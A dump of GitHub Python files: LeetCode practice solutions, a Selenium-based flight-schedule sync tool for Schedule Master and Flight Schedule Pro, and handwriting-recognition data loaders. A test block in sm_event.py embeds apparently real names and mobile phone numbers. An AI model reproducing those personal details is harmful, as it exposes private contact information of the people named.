"no_license", "max_line_length": 13, "num_lines": 5, "path": "/Test.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n用来进行一些代码测试的地方\n\"\"\"\ns = \"123\"\nprint(s[:0])" }, { "alpha_fraction": 0.6183205842971802, "alphanum_fraction": 0.6641221642494202, "avg_line_length": 23.952381134033203, "blob_id": "c589b94492b29fbb09776c59035e38adf7bae1e6", "content_id": "5706219d097628c758219786a40a6a7dcb52e5eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 814, "license_type": "no_license", "max_line_length": 53, "num_lines": 21, "path": "/Question_1/Answer_4.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 先对nums列表进行字典化,形成 [元素值]为键,[元素位置]为值的tmp_dict字典\n2. 对nums进行循环,然后获取第i个元素的差值A\n3. 如果差值A在tmp_dict字典的键中,且差值位置不等于当前位置的话,就是正确的值\n注:执行用时大量减少的原因在于,字典的查找时间比列表的查找时间短非常多\n\"\"\"\nnums = [3, 2, 4, 5, 5]\ntarget = 10\n\ntmp_dict = {}\nfor index, value in enumerate(nums):\n tmp_dict[value] = index\nfor i in range(len(nums)):\n tmp = target - nums[i]\n if tmp in tmp_dict.keys() and tmp_dict[tmp] != i:\n print([i, tmp_dict[tmp]])\n break\n\"\"\"\n执行用时:44 ms, 在所有 Python3 提交中击败了43.19%的用户\n内存消耗:15.9 MB, 在所有 Python3 提交中击败了5.18%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.5589622855186462, "alphanum_fraction": 0.6179245114326477, "avg_line_length": 21.3157901763916, "blob_id": "82f13f31ce57d04ff6818a5f37bbca24fa80bff0", "content_id": "92fbef7af50a91228f4ea13290365faaf7edb5ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 580, "license_type": "no_license", "max_line_length": 53, "num_lines": 19, "path": "/Question_1/Answer_5.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n跟解答4的区别在于,从列表的第二个元素进行字典化\n注:多次运行时间不同,多运行几次,就可以40ms了\n\"\"\"\nnums = [3, 2, 4, 5, 5]\ntarget = 6\n\ntmp_dict = {}\nfor index, value in enumerate(nums[1:]):\n tmp_dict[value] = index+1\nfor i in range(len(nums)):\n tmp = target - nums[i]\n if tmp in tmp_dict.keys() and tmp_dict[tmp] != i:\n print([i, tmp_dict[tmp]])\n break\n\"\"\"\n执行用时:40 ms, 在所有 Python3 提交中击败了67.58%的用户\n内存消耗:15.9 MB, 在所有 Python3 提交中击败了5.18%的用户\n\"\"\"\n" }, { "alpha_fraction": 0.5963401794433594, "alphanum_fraction": 0.631862223148346, "avg_line_length": 26.323530197143555, "blob_id": "07e4c6a80c340de3994aa0d867732c0a0b2d57ad", "content_id": "0d25ba6dc12a84800dce5b3a8c4949de02fb4c34", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1301, "license_type": "no_license", "max_line_length": 59, "num_lines": 34, "path": "/Question_14/Answer_1.py", "repo_name": "WangMingJue/LeetCode", "src_encoding": "UTF-8", "text": "\"\"\"\n1. 先判断strs的个数,如果为0,则返回“”;如果为1,则返回那个元素;如果\"\"在列表中,也返回“”\n2. 设置目前匹配的前缀长度prefix_length,默认为1\n3. 以第一个元素为基准进行while循环,条件为prefix_length的长度不超过第一个元素的长度\n4. 再进行strs的for循环,如果当前的前缀对于所有元素都匹配,就prefix_length加1,再进行匹配\n5. 如果在对某个元素匹配的过程中,是False的话,就直接返回上一次匹配通过的前缀\n\"\"\"\nstrs = [\"abca\", \"aba\", \"aaab\"]\ndef longestCommonPrefix(strs):\n strs_length = len(strs)\n if strs_length == 0 or \"\" in strs:\n return \"\"\n if strs_length == 1:\n return strs[0]\n\n prefix_length = 1\n result = strs[0][:prefix_length]\n while prefix_length <= len(strs[0]):\n for i in strs[1:]:\n if result in i and result == i[:prefix_length]:\n pass\n else:\n return result[:prefix_length - 1]\n prefix_length += 1\n result = strs[0][:prefix_length]\n return result\n\n\nprint(longestCommonPrefix(strs))\n\n\"\"\"\n执行用时:36 ms, 在所有 Python3 提交中击败了90.73%的用户\n内存消耗:15 MB, 在所有 Python3 提交中击败了18.00%的用户\n\"\"\"\n" } ]
12
thomasd57/calsync
https://github.com/thomasd57/calsync
49dbeb4749795d3814a9234a3fe2e212a3349646
0910c5a951be2ad62de0ff66e672c2721113a4cc
8da38e9ffc666d7af7c346bcfc8ad3e46b1a4575
refs/heads/master
2020-03-09T08:34:01.542289
2018-06-05T00:23:19
2018-06-05T00:23:19
128,692,267
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5011127591133118, "alphanum_fraction": 0.5315281748771667, "avg_line_length": 39.84848403930664, "blob_id": "467bfc6eafa8131391d6103db8d6ecb53a3f9426", "content_id": "c10a9b5d6ec4cc738eee9720c5d237ba64872f77", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2696, "license_type": "no_license", "max_line_length": 193, "num_lines": 66, "path": "/sm_event.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport re\nfrom datetime import datetime\n\nclass SMEvent:\n fields = ('who', 'start', 'end', 'resource', 'comment', 'email', 'mobile', 'error')\n def __init__(self):\n for name in self.fields:\n setattr(self, name, None)\n\n ''' Create event from Schedule Master string'''\n @classmethod\n def from_sm(cls, event_string):\n prefix_start = 'Strt: '\n prefix_end = 'End: '\n prefix_resource = 'Lesson: '\n prefix_comment = 'Comment:'\n prefix_mobile = 'mobile: '\n re_mobile = re.compile(r'[\\d-]+')\n re_email = re.compile(r'[\\w.-]+@[\\w.-]+')\n event = cls()\n try:\n event_string = re.sub(r'^ddrivetip\\(\\'', '', event_string)\n event_string = re.sub(r'\\',\\d+\\);\\s*$', '', event_string)\n event_list = event_string.split('<br>')\n event.who = event_list.pop(0)\n for el in event_list:\n if el[:len(prefix_start)] == prefix_start:\n event.start = event.decode_date(el[len(prefix_start):])\n elif el[:len(prefix_end)] == prefix_end:\n event.end = event.decode_date(el[len(prefix_end):])\n elif el[:len(prefix_resource)] == prefix_resource:\n event.resource = el[len(prefix_resource):]\n elif re.match(re_email, el):\n event.email = el.strip()\n elif el[:len(prefix_comment)] == prefix_comment:\n event.comment = el[len(prefix_comment):]\n elif el[:len(prefix_mobile)] == prefix_mobile and re.match(re_mobile, el[len(prefix_mobile):]):\n event.mobile = el[len(prefix_mobile):]\n except Exception as ex:\n event.error = ex\n return event\n\n @staticmethod\n def decode_date(date_string):\n fmt = '%a %m/%d/%y %H:%M'\n return datetime.strptime(date_string, fmt)\n\n def __str__(self):\n rep = []\n for field in self.fields:\n value = getattr(self, field)\n if value is not None:\n rep.append('{}: {}'.format(field, value))\n return '\\n'.join(rep)\n \nif __name__ == '__main__':\n events = ['''ddrivetip('Fang, Gan <br>Strt: Sun 04/08/18 09:30<br>End: Sun 04/08/18 12:00<br>Lesson: 122DZ<br>Local<br>[email protected] <br>mobile: 614-886-4354<br>Comment:Club & SR20 Initial',250);'''\n,\n'''ddrivetip('Daniel, Thomas <br>Strt: Sun 04/08/18 13:00<br>End: Sun 04/08/18 18:00<br>[email protected] <br>hm: 65-529-3078 <br>mobile: 650-279-3429',250);''' ]\n\n import pdb\n # pdb.set_trace()\n for event_string in events:\n event = Event().from_sm(event_string)\n print(event, '\\n')\n" }, { "alpha_fraction": 0.53515625, "alphanum_fraction": 0.5390625, "avg_line_length": 28.538461685180664, "blob_id": "f4f7ca2a9e139d2613b3861993e740d96db777ed", "content_id": "e39c6e3058947ed1bedcfef7cba12aec4bc6a453", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 768, "license_type": "no_license", "max_line_length": 107, "num_lines": 26, "path": "/event.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nfrom datetime import datetime\n\nclass Event:\n def __init__(self, start = None, end = None, customer = None, resource = None):\n self.start = start\n self.end = end\n self.customer = customer\n self.resource = resource\n\n @staticmethod\n def dt_from_str(dt):\n dt = datetime.strptime(dt[:16], '%Y-%m-%dT%H:%M')\n return dt\n\n def push_time(self, tm):\n dt = self.dt_from_str(tm)\n if self.start:\n if self.end:\n raise Exception(\"push time beyond end (\" + tm + \")\")\n self.end = dt\n else:\n self.start = dt\n\n def __str__(self):\n return ','.join([str(self.start), str(self.end), '|'.join(self.customer), '|'.join(self.resource)])\n" }, { "alpha_fraction": 0.6410788297653198, "alphanum_fraction": 0.6452282071113586, "avg_line_length": 31.133333206176758, "blob_id": "12471b472df352687a31a324c6d05c0cde54138d", "content_id": "f1139a80946133f70453ceebbca2cd9d10a5702f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 482, "license_type": "no_license", "max_line_length": 58, "num_lines": 15, "path": "/browser.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nclass Browser:\n def __init__(self, url = None, headless = True):\n options = webdriver.firefox.options.Options()\n if headless:\n options.set_headless()\n self.driver = webdriver.Firefox(options = options)\n self.driver.implicitly_wait(10)\n if url is not None:\n self.driver.get(url)\n\n def get_html(self):\n return self.driver.page_source\n" }, { "alpha_fraction": 0.5774465203285217, "alphanum_fraction": 0.5784186720848083, "avg_line_length": 36.63414764404297, "blob_id": "108d2ae3cd5f8759e086241274c11c7de08b3151", "content_id": "7c1ef93543d4f1b943cdadf90f05be904a7cd0d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3086, "license_type": "no_license", "max_line_length": 136, "num_lines": 82, "path": "/flight_schedule.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nfrom selenium.webdriver.support.ui import Select\nfrom bs4 import BeautifulSoup\n\nimport browser\nfrom event import Event\n\nimport pdb\n\nclass FlightSchedule(browser.Browser):\n attr_table = { 'reservation | reservationListResourceDisplayFilter' : 'resource',\n 'reservation | reservationListCustomerDisplayFilter:operator' : 'customer',\n }\n def __init__(self, headless = True):\n self.userid = os.environ['FS_USERID']\n self.password = os.environ['FS_PASSWORD']\n self.schedule = []\n super().__init__(\"https://app.flightschedulepro.com/Account/Login\", headless = headless)\n self.logger = logging.getLogger(__name__)\n self.logger.info('fetched login page')\n\n def login(self):\n userid = self.driver.find_element_by_id('username')\n userid.send_keys(self.userid)\n password = self.driver.find_element_by_id('password')\n password.send_keys(self.password)\n submit = self.driver.find_element_by_tag_name('button')\n submit.click()\n self.logger.info('login successful')\n time.sleep(3)\n\n def get_schedule(self):\n self.driver.get('https://app.flightschedulepro.com/App/Reservations/')\n time.sleep(5)\n events = []\n soup = BeautifulSoup(self.get_html(), 'html.parser')\n table = soup.find('table').find('tbody')\n for row in table.find_all('tr'):\n event = Event()\n for cell in row.find_all('td'):\n for times in cell.find_all('time'):\n try:\n event.push_time(times['datetime'])\n except KeyError:\n pass\n try:\n attr = self.attr_table[cell['ng-bind-html']]\n if cell.string:\n value = [cell.string]\n else:\n value = list(cell.strings)\n setattr(event, attr, value)\n except KeyError:\n pass\n events.append(event)\n return events\n\nif __name__ == '__main__':\n import time\n import argparse\n import json\n import logging\n parser = argparse.ArgumentParser(description = 'Access Schedule Master')\n parser.add_argument('-v', '--view', help = 'See browser window, by default headless', action = 'store_true')\n parser.add_argument('-e', '--event', help = 'Create new events from json file')\n parser.add_argument('-l', '--log_level', help = 'logging level', choices = ('DEBUG', 'INFO', 'WARNING', 'ERROR'), default = 'ERROR')\n args = parser.parse_args()\n logging.basicConfig(format = '%(levelname)s: %(message)s', level = getattr(logging, args.log_level))\n events = []\n if args.event:\n events = json.load(open(args.event))\n driver = FlightSchedule(not args.view)\n driver.login()\n\n #for event in events:\n # driver.store_event(event)\n for event in driver.get_schedule():\n print(event, '\\n')\n if not args.view:\n driver.driver.close()\n" }, { "alpha_fraction": 0.6182413697242737, "alphanum_fraction": 0.6250682473182678, "avg_line_length": 44.209877014160156, "blob_id": "a17b002ffeac99484f15af2d302b95a9d11a140f", "content_id": "186b0eb59729f4add8694cfbfb42ef1aab9516cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3662, "license_type": "no_license", "max_line_length": 136, "num_lines": 81, "path": "/schedule_master.py", "repo_name": "thomasd57/calsync", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nfrom selenium.webdriver.support.ui import Select\n\nimport browser\nimport sm_event\n\nclass ScheduleMaster(browser.Browser):\n def __init__(self, headless = True):\n self.userid = os.environ['SM_USERID']\n self.password = os.environ['SM_PASSWORD']\n self.schedule = []\n super().__init__(\"https://my.schedulemaster.com\", headless = headless)\n self.logger = logging.getLogger(__name__)\n self.logger.info('fetched login page')\n\n def login(self):\n for form in self.driver.find_elements_by_tag_name('form'):\n if form.get_attribute('action').split('/')[-1] == 'login.asp':\n userid = form.find_element_by_name('USERID')\n userid.send_keys(self.userid)\n password = form.find_element_by_name('DATA')\n password.send_keys(self.password)\n form.submit()\n # switch to iframe\n self.driver.get(self.driver.find_element_by_id('asp_legacy').get_attribute('src'))\n self.userid = self.driver.find_element_by_name('USERID').get_attribute('value')\n self.session = self.driver.find_element_by_name('SESSION').get_attribute('value')\n self.schedule = self.driver.find_element_by_id('res_table2')\n self.username = self.schedule.find_element_by_class_name('InactiveLink').text.split(',')[0]\n self.logger.info('login successful')\n \n def get_schedule(self):\n schedule = []\n for button in self.schedule.find_elements_by_tag_name('button'):\n attr = button.get_attribute('onMouseOver')\n if attr is not None:\n schedule.append(sm_event.SMEvent().from_sm(attr))\n self.logger.info('fetched current schedule')\n return schedule\n\n def store_event(self, event):\n url = ['https://my.schedulemaster.com/schedlesson.aspx?WINDOW=YES']\n url.append('N_NO={}'.format(self.username))\n url.append('USERID={}'.format(self.userid))\n url.append('SESSION={}'.format(self.session))\n self.driver.get('&'.join(url))\n self.fill_date('ctl00_CPL1_dt_StartDate2', 'ctl00_CPL1_ddl_StartTime2', event.start)\n self.fill_date('ctl00_CPL1_dt_EndDate2', 'ctl00_CPL1_ddl_EndTime2', event.end)\n self.driver.find_element_by_name('ctl00$CPL1$btnMakeSched').click()\n self.logger.info('stored event\\n{}'.format(event))\n\n def fill_date(self, id_date, id_time, value):\n date = self.driver.find_element_by_id(id_date)\n date.clear()\n date.send_keys('{}/{}/{}'.format(value.month, value.day, value.year))\n time = Select(self.driver.find_element_by_id(id_time))\n time.select_by_index(value.hour * 2 + int(value.minute / 30))\n\n\nif __name__ == '__main__':\n import argparse\n import json\n import logging\n parser = argparse.ArgumentParser(description = 'Access Schedule Master')\n parser.add_argument('-v', '--view', help = 'See browser window, by default headless', action = 'store_true')\n parser.add_argument('-e', '--event', help = 'Create new events from json file')\n parser.add_argument('-l', '--log_level', help = 'logging level', choices = ('DEBUG', 'INFO', 'WARNING', 'ERROR'), default = 'ERROR')\n args = parser.parse_args()\n logging.basicConfig(format = '%(levelname)s: %(message)s', level = getattr(logging, args.log_level))\n events = []\n if args.event:\n events = json.load(open(args.event))\n driver = ScheduleMaster(not args.view)\n driver.login()\n for event in events:\n driver.store_event(event)\n for event in driver.get_schedule():\n print(event, '\\n')\n driver.driver.close()\n" } ]
5
Aman6744/project_backup_words
https://github.com/Aman6744/project_backup_words
3fded0bfd6c17dad91fbc669cde9fa2328e6745d
1fc2b6039c50f8fb08d394f5a68a5355d8bd3cd5
a620e82bf31937495933950e5ed828f420a3ada1
refs/heads/master
2023-03-09T09:27:04.833695
2021-02-20T10:00:47
2021-02-20T10:00:47
339,674,812
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4907229542732239, "alphanum_fraction": 0.5013862252235413, "avg_line_length": 36.50400161743164, "blob_id": "2f6b3618ec1957d0b7e8e6dc6f54eedf25b180a1", "content_id": "c7fd37e952063106a0d687cb0d4bd864a67c0e7a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4689, "license_type": "no_license", "max_line_length": 136, "num_lines": 125, "path": "/src/data/generator_shuffle.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import h5py\nimport string\nimport numpy as np\nimport tensorflow as tf\n\nimport Preprocess_image as pp\nfrom data.tokenizer import Tokenizer\n\nclass Datagenerator(tf.keras.utils.Sequence):\n def __init__(self, source_path, charset, partition, batch_size=32, maxTextLength, buf_size=0):\n self.maxTextLength = maxTextLength\n self.tokenizer = Tokenizer(\n filters=string.printable.translate(\n str.maketrans(\"\", \"\", charset)\n ), \n charset=charset\n )\n # self.tokenizer.fit_on_texts(charset)\n self.batch_size = batch_size\n self.partition = partition\n self.dataset = h5py.File(source_path, 'r')[self.partition]\n self.size = self.dataset['label'].shape[0]\n self.steps = int(np.ceil(self.size/self.batch_size))\n self.buf_size = buf_size\n # if self.partition in ['train'] and self.buf_size:\n # self.img_buf = self.dataset['image'][0:self.buf_size]\n # self.lab_buf = self.dataset['label'][0:self.buf_size]\n\n # for p in self.partitions:\n # self.size[p] = self.dataset[p]['image'].shape[0]\n # self.steps[p] = int(np.ceil(self.size[p]/self.batch_size))\n # self.index[p] = 0\n\n\n def __len__(self):\n return self.steps\n \n def __getitem__(self, idx):\n if self.partition in ['valid', 'test'] or not self.buf_size:\n index = idx*self.batch_size\n until = index+self.batch_size\n\n x = np.array(self.dataset['image'][index:until]) \n if self.partition in ['train']:\n x = pp.augmentation(x, \n rotation_range=5.0, \n scale_range=0.05, \n height_shift_range=0.025, \n width_shift_range=0.05, \n erode_range=5, \n dilate_range=3)\n x = pp.normalization(x)\n if self.partition in ['valid', 'train']:\n y = self.dataset['label'][index:until]\n # y = [self.tokenizer.texts_to_sequences(word.decode())[0] for word in y]\n # y = np.array([np.pad(np.asarray(seq), (0, self.maxTextLength-len(seq)), constant_values=(-1, self.PAD)) for seq in y])\n y_ = []\n for word in y:\n seq = self.tokenizer.texts_to_sequences(word.decode())[0]\n padded_seq = np.pad(seq, (0, self.maxTextLength-len(seq)))\n y_.append(padded_seq)\n\n y = np.array(y_)\n\n return (x, y)\n return x\n\n else :\n index = idx*self.batch_size + self.buf_size\n until = index+self.batch_size\n\n zipped = list(zip(self.img_buf, self.lab_buf))\n np.random.shuffle(zipped)\n\n X, Y = zip(*zipped)\n X = list(X)\n Y = list(Y)\n\n x = np.array(X[:self.batch_size])\n y = Y[:self.batch_size]\n\n if until < self.size:\n X[:self.batch_size] = self.dataset['image'][index:until]\n Y[:self.batch_size] = self.dataset['label'][index:until]\n\n elif index < self.size:\n X = X[until-self.size:]\n Y = Y[until-self.size:]\n until = self.size\n X[:until-index] = self.dataset['image'][index:until]\n Y[:until-index] = self.dataset['label'][index:until]\n\n else:\n X = X[self.batch_size:]\n Y = Y[self.batch_size:]\n\n self.img_buf = X\n self.lab_buf = Y\n\n x = pp.augmentation(x, \n rotation_range=5.0, \n scale_range=0.05, \n height_shift_range=0.025, \n width_shift_range=0.05, \n erode_range=5, \n dilate_range=3)\n x = pp.normalization(x)\n # y = [self.tokenizer.texts_to_sequences(word.decode())[0] for word in y]\n # y = np.array([np.pad(np.asarray(seq), (0, self.maxTextLength-len(seq)), constant_values=(-1, self.PAD)) for seq in y])\n y_ = []\n for word in y:\n seq = self.tokenizer.texts_to_sequences(word.decode())[0]\n padded_seq = np.pad(seq, (0, self.maxTextLength-len(seq)))\n y_.append(padded_seq)\n\n y = np.array(y_)\n\n return (x, y)\n\n\n\n def on_epoch_end(self):\n if self.partition in ['train'] and self.buf_size:\n self.img_buf = self.dataset['image'][0:self.buf_size]\n self.lab_buf = self.dataset['label'][0:self.buf_size]\n\n" }, { "alpha_fraction": 0.686956524848938, "alphanum_fraction": 0.686956524848938, "avg_line_length": 22.200000762939453, "blob_id": "fdad58b5a0858fd64bd6b78c8feb0e2ef319b64e", "content_id": "f984965d003f4c574f13f59916c7526a7831f71c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 115, "license_type": "no_license", "max_line_length": 60, "num_lines": 5, "path": "/src/config/config.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import os\n\noutput_path = os.path.join(\"..\", \"output\")\n\njson_file = os.path.join(output_path, \"initial_params.json\")" }, { "alpha_fraction": 0.5181058645248413, "alphanum_fraction": 0.5292479395866394, "avg_line_length": 36.129310607910156, "blob_id": "669c871a29339e40c3d8baa6d70d52296da4d2ac", "content_id": "b4e05c764a98443d9e06aef0c2a8bc3611e4c8a7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4308, "license_type": "no_license", "max_line_length": 190, "num_lines": 116, "path": "/src/Create_hdf5.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\nimport multiprocessing\nimport h5py\n\nfrom tqdm import tqdm\nfrom glob import glob\nfrom path import Path\nfrom functools import partial\nimport Preprocess_image as pp\n\nclass Sample():\n def __init__(self, file_path, label):\n self.file_path = file_path\n self.label = label\n\nclass Dataset():\n def __init__(self, raw_path):\n\n assert Path(raw_path).exists()\n\n self.dataset = {\n 'train': {\n 'image':[],\n 'label':[], \n 'augmentation':True\n }, \n 'test': {\n 'image':[], \n 'label':[], \n 'augmentation':False\n },\n 'valid': {\n 'image':[], \n 'label':[], \n 'augmentation':False\n }\n }\n self.samples = []\n self.imgdir = os.path.join(raw_path, \"words\")\n self.label_path = os.path.join(raw_path, \"words.txt\")\n self.partitions = ['train', 'test', 'valid']\n\n def make_partitions(self):\n label = open(self.label_path).read().splitlines()\n for line in label:\n if line[0] == '#' or not line:\n continue\n lineSplit = line.strip().split()\n if len(lineSplit) < 9:\n continue\n transcription = pp.preprocess_label(\" \".join(lineSplit[8:]), self.maxTextLength)\n if transcription[0]:\n transcription = transcription[1]\n else:\n continue\n fileNameSplit = lineSplit[0].split('-')\n fileName = os.path.join(self.imgdir, fileNameSplit[0], \"-\".join(fileNameSplit[0:2]), lineSplit[0]) + \".png\"\n sample = Sample(fileName, transcription)\n self.samples.append(sample)\n\n np.random.shuffle(self.samples)\n\n splitIdx1 = {'train':0, 'test':0, 'valid':0}\n splitIdx2 = {'train':0, 'test':0, 'valid':0}\n splitIdx1['test'] = splitIdx2['train'] = int(0.8 * len(self.samples))\n splitIdx2['test'] = splitIdx1['valid'] = int(0.9 * len(self.samples))\n splitIdx2['valid'] = len(self.samples)\n\n dataset = self.dataset\n for p in self.partitions:\n dataset[p]['image'] += [sample.file_path for sample in self.samples[splitIdx1[p]:splitIdx2[p]]]\n dataset[p]['label'] += [sample.label for sample in self.samples[splitIdx1[p]:splitIdx2[p]]]\n\n return dataset\n\n def read_partitions(self):\n dataset = self.make_partitions()\n\n for p in self.partitions:\n self.dataset[p]['image'] += dataset[p]['image']\n self.dataset[p]['label'] += dataset[p]['label']\n\n\n def save_partitions(self, target, target_image_shape, maxTextLength=32):\n self.maxTextLength = maxTextLength\n self.read_partitions()\n\n os.makedirs(os.path.dirname(target), exist_ok=True)\n total = 0\n\n with h5py.File(target, 'w') as hf:\n for p in self.partitions:\n size = (len(self.dataset[p]['image']), ) + target_image_shape[:2]\n total += size[0]\n\n hf.create_dataset(f\"{p}/image\", size, dtype=np.uint8, compression='gzip', compression_opts=9)\n hf.create_dataset(f\"{p}/label\", (size[0],), dtype=f\"S{maxTextLength}\", compression='gzip', compression_opts=9)\n\n pbar = tqdm(total=total)\n batch_size = 1024\n\n for p in self.partitions:\n for batch in range(0, len(self.dataset[p]['image']), batch_size):\n images = []\n\n with multiprocessing.Pool(multiprocessing.cpu_count()) as pool:\n r = pool.map(partial(pp.preprocess_image, target_size=target_image_shape, augmentation=self.dataset[p]['augmentation']), self.dataset[p]['image'][batch:batch+batch_size])\n images.append(r)\n pool.close()\n pool.join()\n\n with h5py.File(target, \"a\") as hf:\n hf[f\"{p}/image\"][batch:batch+batch_size] = images\n hf[f\"{p}/label\"][batch:batch+batch_size] = [s.encode() for s in self.dataset[p]['label'][batch:batch+batch_size]]\n pbar.update(batch_size)\n\n" }, { "alpha_fraction": 0.5015636086463928, "alphanum_fraction": 0.515876829624176, "avg_line_length": 37.66511535644531, "blob_id": "08c5aaf845032193ca918759f4643409062fda3c", "content_id": "e722e8c6cb8e6ea1cff936806cf1638a69d8aa71", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8314, "license_type": "no_license", "max_line_length": 139, "num_lines": 215, "path": "/src/data/generator.py", "repo_name": "Aman6744/project_backup_words", "src_encoding": "UTF-8", "text": "import h5py\nimport string\nimport numpy as np\nimport tensorflow as tf\n\nimport Preprocess_image as pp\nfrom data.tokenizer import Tokenizer\n\ndef preprocessor_helper(x, y, charset, partition, maxTextLength):\n charset = charset.numpy().decode()\n partition = partition.numpy().decode()\n maxTextLength = maxTextLength.numpy()\n y = y.numpy()\n x = x.numpy()\n tokenizer = Tokenizer(\n filters=string.printable.translate(\n str.maketrans(\"\", \"\", charset)\n ), \n charset=charset\n )\n if y.any():\n y_ = []\n for word in y:\n seq = tokenizer.texts_to_sequences(word.decode())[0]\n padded_seq = np.pad(seq, (0, maxTextLength-len(seq)))\n y_.append(padded_seq)\n\n y = np.array(y_)\n\n if partition in [\"train\"]:\n x = pp.augmentation(x, \n rotation_range=5.0, \n scale_range=0.05, \n height_shift_range=0.025, \n width_shift_range=0.05, \n erode_range=5, \n dilate_range=3)\n\n x = pp.normalization(x)\n\n if y.any():\n return x, y\n else:\n return x\n\ndef create_dataset(source_path, charset, partition, maxTextLength, batch_size=32, buf_size=1000, prefetch_size=10):\n with h5py.File(source_path, \"r\") as f:\n imgs = f[partition][\"image\"][:100]\n labels = f[partition][\"label\"][:100]\n \n def get_img_label(x):\n index = x.numpy()\n if partition in [\"test\"]:\n return imgs[index]\n else:\n return imgs[index], labels[index]\n\n dataset_size = len(labels)\n indexes = [i for i in range(dataset_size)]\n np.random.shuffle(indexes)\n\n index_ds = tf.data.Dataset.from_tensor_slices(indexes)\n if partition in [\"train\"]:\n ds = index_ds.map(lambda x: tf.py_function(get_img_label, [x], [tf.uint8, tf.string])).shuffle(buf_size).batch(batch_size)\n final_ds = ds.map(lambda x,y: tf.py_function(preprocessor_helper, [x,y,charset,partition,maxTextLength], [tf.float32, tf.float32]))\n elif partition in [\"valid\"]:\n ds = index_ds.map(lambda x: tf.py_function(get_img_label, [x], [tf.uint8, tf.string])).batch(batch_size)\n final_ds = ds.map(lambda x,y: tf.py_function(preprocessor_helper, [x,y,charset,partition,maxTextLength], [tf.float32, tf.float32]))\n else:\n ds = index_ds.map(lambda x: tf.py_function(get_img_label, [x], [tf.uint8])).batch(batch_size)\n final_ds = ds.map(lambda x: tf.py_function(preprocessor_helper, [x,False,charset,partition,maxTextLength], [tf.float32]))\n\n return final_ds.prefetch(prefetch_size)\n\nif __name__ == \"__main__\":\n import matplotlib.pyplot as plt\n import cv2\n charset = string.printable[:84]\n tokenizer = Tokenizer(\n filters=string.printable.translate(\n str.maketrans(\"\", \"\", charset)\n ), \n charset=charset\n )\n ds = create_dataset(\"../data/dataset_hdf5/iam_words.hdf5\", string.printable[:84], \"train\", 32, 2, 10, 2)\n for i, l in ds.take(1):\n print(i.shape, tokenizer.sequences_to_texts(np.swapaxes([l.numpy()], 0, 1)))\n plt.subplot(121)\n plt.imshow(pp.adjust_to_see(i[0].numpy()), cmap=\"gray\")\n plt.subplot(122)\n plt.imshow(pp.adjust_to_see(i[1].numpy()), cmap=\"gray\")\n plt.show()\n\n# class Datagenerator(tf.keras.utils.Sequence):\n# def __init__(self, source_path, charset, partition, maxTextLength, batch_size=32, buf_size=0):\n# self.maxTextLength = maxTextLength\n# self.tokenizer = Tokenizer(\n# filters=string.printable.translate(\n# str.maketrans(\"\", \"\", charset)\n# ), \n# charset=charset\n# )\n# # self.tokenizer.fit_on_texts(charset)\n# self.batch_size = batch_size\n# self.partition = partition\n# self.source_path = source_path\n# with h5py.File(self.source_path, 'r') as a:\n# dataset = a[self.partition]\n# self.size = dataset['label'].shape[0]\n# self.steps = int(np.ceil(self.size/self.batch_size))\n# self.buf_size = buf_size\n\n# # if self.partition in ['train'] and self.buf_size:\n# # self.img_buf = self.dataset['image'][0:self.buf_size]\n# # self.lab_buf = self.dataset['label'][0:self.buf_size]\n\n# # for p in self.partitions:\n# # self.size[p] = self.dataset[p]['image'].shape[0]\n# # self.steps[p] = int(np.ceil(self.size[p]/self.batch_size))\n# # self.index[p] = 0\n\n\n# def __len__(self):\n# return self.steps\n \n# def __getitem__(self, idx):\n# # if self.partition in ['valid', 'test'] or not self.buf_size:\n# with h5py.File(self.source_path, 'r') as a:\n# dataset = a[self.partition]\n# index = idx*self.batch_size\n# until = index+self.batch_size\n\n# x = np.array(dataset['image'][index:until]) \n# if self.partition in ['train']:\n# x = pp.augmentation(x, \n# rotation_range=5.0, \n# scale_range=0.05, \n# height_shift_range=0.025, \n# width_shift_range=0.05, \n# erode_range=5, \n# dilate_range=3)\n# x = pp.normalization(x)\n# if self.partition in ['valid', 'train']:\n# y = dataset['label'][index:until]\n# # y = [self.tokenizer.texts_to_sequences(word.decode())[0] for word in y]\n# # y = np.array([np.pad(np.asarray(seq), (0, self.maxTextLength-len(seq)), constant_values=(-1, self.PAD)) for seq in y])\n# y_ = []\n# for word in y:\n# seq = self.tokenizer.texts_to_sequences(word.decode())[0]\n# padded_seq = np.pad(seq, (0, self.maxTextLength-len(seq)))\n# y_.append(padded_seq)\n\n# y = np.array(y_)\n\n# return (x, y)\n# return x\n\n# # else :\n# # index = idx*self.batch_size + 